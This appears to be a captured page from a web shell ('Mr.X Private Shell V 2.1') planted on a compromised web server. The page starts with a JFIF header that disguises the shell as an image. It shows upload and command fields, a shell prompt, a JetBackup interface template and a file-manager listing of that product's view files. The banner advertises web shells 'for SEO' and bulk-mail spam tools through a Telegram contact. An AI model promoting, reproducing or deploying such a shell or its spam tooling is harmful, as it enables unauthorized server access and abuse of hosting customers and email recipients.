����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
<div>

    <div id="alert-floating-container" ng-show="alerts.length">
        <alert-box
                ng-repeat="alert in alerts"
                ng-model="alert"
                auto-close="alert.ttl">
        </alert-box>
    </div>

    <div class="nav-md">
        <div class="container body">
            <div class="main_container" ng-class="{ 'full-screen': perm.isFullScreen, 'menu-expanded': menuExpanded && !perm.isFullScreen }">
                <div class="col-md-3 left_col" ng-if="!perm.isFullScreen">
                    <div class="scroll-view">
                        <div class="navbar nav_title" style="border: 0; position: relative;">
                        <span ng-click="toggleMenu()" class="menu-button" ng-class="{ 'menu-button-collapse': !menuExpanded, 'menu-button-expand': menuExpanded }">
                            <span class="fas" style="margin-right: 2px;" ng-class="{ 'fa-caret-left': menuExpanded, 'fa-caret-right': !menuExpanded }"></span>
                        </span>
                            <span style="cursor: pointer;" ng-click="toggleMenu()"><span class="site_title" title="JetBackup"></span></span>
                        </div>

                        <div class="clearfix"></div>

                        <div ng-cloak>
                            <div ng-include="includePath('sideMenu')"></div>
                        </div>
                    </div>
                </div>

                <div class="right_col" role="main">
                    <div id="loading-bar-container"></div>
                    <div id="page-content" ng-cloak>
                        <header>
                            <div class="row">
                                <div class="col-md-6 col-sm-6 col-xs-6">
                                    <div style="margin-left: 10px; line-height: 30px;" class="ng-binding">{{lang.t("Server Date: %s", lang.d())}}</div>
                                </div>
                                <div class="col-md-6 col-sm-6 col-xs-6" style="text-align: end;">
                                    {{lang.t("Logged in as")}}: <strong class="ng-binding">{{loggedAccount.nickname ? loggedAccount.nickname : loggedAccount.username}}</strong>
                                    <span> | 
                                        <a href="{{primaryURL}}/myAccount" ng-click="changeView('/myAccount')" class="btn btn-primary btn-xs ng-binding">{{lang.t("My Account")}}</a>
                                        <a ng-show="logoutURL" href="{{logoutURL}}" class="btn btn-primary btn-xs ng-binding">{{lang.t("Logout")}}</a>
                                    </span>
                                    
                                    <a href="" ng-show="perm.isRoot" ng-click="changeView('/support')" uib-tooltip="{{ lang.t('Support') }}" tooltip-placement="bottom-right" style="margin-left: 20px; width: 28px; height: 28px; display: inline-block; border: 1px solid #cccccc; border-radius: 3px; padding: 3px;"><span class="fas fa-life-ring" style="font-size: 20px;"></span></a>
                                </div>
                            </div>
                        </header>
                        
                        <div class='alert alert-danger' style="margin-top: 20px;" ng-if="!perm.isEnduser && !processStatus">
                            <div class='alert-message'>
                                <strong class="alert-title" style="font-size: 20px;">{{lang.t("JetBackup main service is down")}}</strong>
                                <div class="alert-body">
                                    {{lang.t("We noticed that the main JetBackup service is not running.")}}<br />
                                    {{lang.t("As a result of this no automated tasks will be performed, such as backup, restore, download and many more.")}}<br />
                                    {{lang.t("Please try executing the following command via shell in order to start the service:")}}
                                    <code>systemctl start jetbackup5d.service</code>
                                </div>
                            </div>
                        </div>

                        <div class='alert alert-warning' style="margin-top: 20px;" ng-if="!perm.isEnduser && !processSyncAccountsStatus">
                            <div class='alert-message'>
                                <strong class="alert-title" style="font-size: 20px;">{{lang.t("Sync Accounts is in progress")}}</strong>
                                <div class="alert-body">
                                    {{lang.t("Account synchronization is running in the background.")}}<br />
                                    {{lang.t("Operations like Backup, Restore & Download are currently not available.")}}<br /><br />
                                    {{lang.t("You can monitor the progress via the JetBackup main log at the following file - ")}} <code>/usr/local/jetapps/var/log/jetbackup5/jetbackupd.log</code>
                                </div>
                            </div>
                        </div>

                        <div class='alert alert-warning' style="margin-top: 20px;" ng-if="!perm.isEnduser && canDeleteSnapshots">
                            <div class='alert-message'>
                                <strong class="alert-title" style="font-size: 20px;">{{lang.t("Warning! Snapshot deletion is enabled")}}</strong>
                                <div class="alert-body">
                                    {{lang.t("Snapshot deletion is enabled from your server GUI, and we strongly recommend disabling this option when not in use.")}}<br />
                                    {{lang.t("To disable this option and remove this warning execute the following command from your server terminal:")}} <code>jetbackup5 --disable-delete-snapshot</code>
                                </div>
                            </div>
                        </div>

                        <div class='alert alert-warning' style="margin-top: 20px;" ng-if="!perm.isEnduser && inRescueMode">
                            <div class='alert-message'>
                                <strong class="alert-title" style="font-size: 20px;">{{lang.t("System is under rescue mode")}}</strong>
                                <div class="alert-body">
                                    {{lang.t("System rescue is in process, Please check the logs for more information")}}<br />
                                </div>
                            </div>
                        </div>

                        <div class='alert alert-danger' style="margin-top: 20px;" ng-if="!perm.isEnduser && perm.isRoot && !avx_enabled">
                            <div class='alert-message'>
                                <strong class="alert-title" style="font-size: 20px;">{{lang.t("ATTENTION REQUIRED - Upcoming JetBackup MongoDB Upgrade")}}</strong>
                                <div class="alert-body">
                                    {{lang.t("We detected that your CPU does not have the AVX instruction set flag enabled.") }}<br />
                                    {{lang.t("JetBackup 5 will be updating to MongoDB 6.0+ soon which requires the use of the") }} <a style="font-weight: bold; text-decoration: underline;" target="_blank" href="https://www.mongodb.com/docs/manual/administration/production-notes/">{{lang.t("AVX instruction set")}}</a>.<br />
                                    {{lang.t("Please verify that your CPU meets this requirement to avoid disruptions on your backups and ensure you continue receiving the latest JetBackup updates.")}}<br /><br />
                                    {{lang.t("To verify the flags are enabled, look for AVX/AVX2 in the \"Flags\" section of ")}} <code>lscpu</code><br /><br />
                                    <span style="font-size: 11px;">{{lang.t("To permanently acknowledge this message, use")}} <code>touch /usr/local/jetapps/etc/jetbackup5/disable_avx_alerts.flag</code></span>
                                </div>
                            </div>
                        </div>

                        <alert-box ng-repeat="message in info.messages" style="margin-top: 20px;" ng-model="message"></alert-box>
                        <div ng-view></div>
                    </div>
                </div>

                <footer>
                    <div class="pull-left"></div>
                    <div class="pull-right">
                        <div><span ng-cloak>
                            {{ lang.t("Base Version %s Panel Version %s", info.version, info.version_panel) }}<span ng-if="!perm.isEnduser"> | {{ lang.t("Updates Tier %s", info.tier) }}<span ng-if="perm.isRoot && !perm.isFullScreen"> &bull; <a style="color: #fd6b2b;" href="{{primaryURL}}/settings/update" ng-click="changeView('/settings/update')">{{ lang.t("Update Preferences") }}</a></span></span> | </span>Copyright © {{ info.currentYear }} <a href="https://jetapps.com" style="color: #fd6b2b;" target="_blank">JetApps</a>. All rights reserved.
                        </div>
                    </div>
                    <div class="clearfix"></div>
                </footer>
            </div>
        </div>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
accountFilters Folder 0755
destinations Folder 0755
disasterRecovery Folder 0755
notifications Folder 0755
settings Folder 0755
support Folder 0755
404.htm File 692 B 0644
accountActions.htm File 1.21 KB 0644
accountBackups.htm File 18.06 KB 0644
accountBackupsDownloadSummary.htm File 2.86 KB 0644
accountBackupsLockSummary.htm File 1.44 KB 0644
accountBackupsRestoreSummary.htm File 8.97 KB 0644
accountBackupsUnlockSummary.htm File 648 B 0644
accountDownloads.htm File 3.71 KB 0644
accountDropdown.htm File 1.18 KB 0644
accountExcludeListSelection.htm File 2.59 KB 0644
accountFilterActions.htm File 495 B 0644
accountFilterGroupActions.htm File 498 B 0644
accountFilterGroupManage.htm File 1.52 KB 0644
accountFilterGroupManageFields.htm File 1.26 KB 0644
accountFilterGroupManagePopup.htm File 581 B 0644
accountFilterGroupSelection.htm File 1.25 KB 0644
accountFilterGroups.htm File 5.06 KB 0644
accountFilterManage.htm File 1.49 KB 0644
accountFilterManageFields.htm File 3.17 KB 0644
accountFilterManagePopup.htm File 565 B 0644
accountFilters.htm File 4.57 KB 0644
accountManage.htm File 8.49 KB 0644
accountOrphanActions.htm File 587 B 0644
accountPackagesSelection.htm File 992 B 0644
accountReassign.htm File 3.24 KB 0644
accountSelection.htm File 1.35 KB 0644
accounts.htm File 10.93 KB 0644
accountsOrphans.htm File 7.91 KB 0644
accountsSelection.htm File 1.06 KB 0644
addons.htm File 1.04 KB 0644
agreement.htm File 44.62 KB 0644
agreementPanel.htm File 2.01 KB 0644
alerts.htm File 5.28 KB 0644
backupJobActions.htm File 2.09 KB 0644
backupJobManage.htm File 29.23 KB 0644
backupJobs.htm File 10.26 KB 0644
backupJobsSelection.htm File 958 B 0644
backupLockSelection.htm File 1.27 KB 0644
cloneJobActions.htm File 1.93 KB 0644
cloneJobManage.htm File 22.33 KB 0644
cloneJobs.htm File 7.68 KB 0644
cloneJobsSelection.htm File 955 B 0644
confirm.htm File 535 B 0644
dashboard.htm File 29.3 KB 0644
destinationActions.htm File 4.04 KB 0644
destinationManage.htm File 10.9 KB 0644
destinations.htm File 10.59 KB 0644
destinationsSelection.htm File 1.08 KB 0644
disableUI.htm File 318 B 0644
disasterRecovery.htm File 2.58 KB 0644
downloads.htm File 5.9 KB 0644
encryptionKeySelection.htm File 1.03 KB 0644
extension.htm File 6.73 KB 0644
fileBrowse.htm File 4.93 KB 0644
fileManager.htm File 1.87 KB 0644
fileManagerDownload.htm File 840 B 0644
fileManagerPopup.htm File 424 B 0644
fileManagerRestore.htm File 1.03 KB 0644
fileManagerView.htm File 6.24 KB 0644
filePermissions.htm File 5.78 KB 0644
filePermissionsActions.htm File 503 B 0644
filePermissionsManage.htm File 6.45 KB 0644
hookActions.htm File 1.12 KB 0644
hookManage.htm File 14.09 KB 0644
hooks.htm File 5.94 KB 0644
license.htm File 1.71 KB 0644
listSelection.htm File 834 B 0644
logActions.htm File 1.24 KB 0644
logItemActions.htm File 616 B 0644
logItems.htm File 7.99 KB 0644
logViewer.htm File 1.64 KB 0644
login.htm File 5 B 0644
logs.htm File 7.02 KB 0644
main.htm File 9.06 KB 0644
modifyDatabasesExcludes.htm File 1.19 KB 0644
modifyMongoDBExcludes.htm File 1.04 KB 0644
modifyMySQLExcludes.htm File 1.03 KB 0644
modifyPostgreSQLExcludes.htm File 1.04 KB 0644
myAccount.htm File 9.88 KB 0644
packageActions.htm File 402 B 0644
packages.htm File 6.17 KB 0644
permissions.htm File 5.59 KB 0644
plugin.htm File 76 B 0644
pluginActions.htm File 1.43 KB 0644
pluginManage.htm File 5.3 KB 0644
plugins.htm File 1.48 KB 0644
queue.htm File 8.43 KB 0644
queueActions.htm File 815 B 0644
queueItemActions.htm File 464 B 0644
queueItems.htm File 8.97 KB 0644
queueLogViewer.htm File 1.71 KB 0644
queuePriorities.htm File 5.59 KB 0644
queuePriorityActions.htm File 927 B 0644
queuePriorityManage.htm File 7.1 KB 0644
repositories.htm File 3.44 KB 0644
repositoryActions.htm File 755 B 0644
repositoryManage.htm File 2.85 KB 0644
restore.htm File 1.19 KB 0644
restoreConditionActions.htm File 1.05 KB 0644
restoreConditionManage.htm File 2.22 KB 0644
restoreConditions.htm File 3.26 KB 0644
restoreDirectories.htm File 8.81 KB 0644
restoreDisasterRecovery.htm File 5.97 KB 0644
restoreMultiAccount.htm File 49.16 KB 0644
restoreSingle.htm File 14.48 KB 0644
restoreSingleAccount.htm File 1.95 KB 0644
scheduleActions.htm File 689 B 0644
scheduleManage.htm File 1.67 KB 0644
scheduleManageFields.htm File 5.99 KB 0644
scheduleManagePopup.htm File 670 B 0644
scheduleSelection.htm File 1.98 KB 0644
schedules.htm File 4.27 KB 0644
security.htm File 4.69 KB 0644
securityAvailablePlugins.htm File 737 B 0644
settings.htm File 2.12 KB 0644
showcase.htm File 640 B 0644
sideMenu.htm File 213 B 0644
support.htm File 2.59 KB 0644
tagActions.htm File 620 B 0644
tagManage.htm File 3.84 KB 0644
tags.htm File 4.13 KB 0644
tagsSelection.htm File 1.25 KB 0644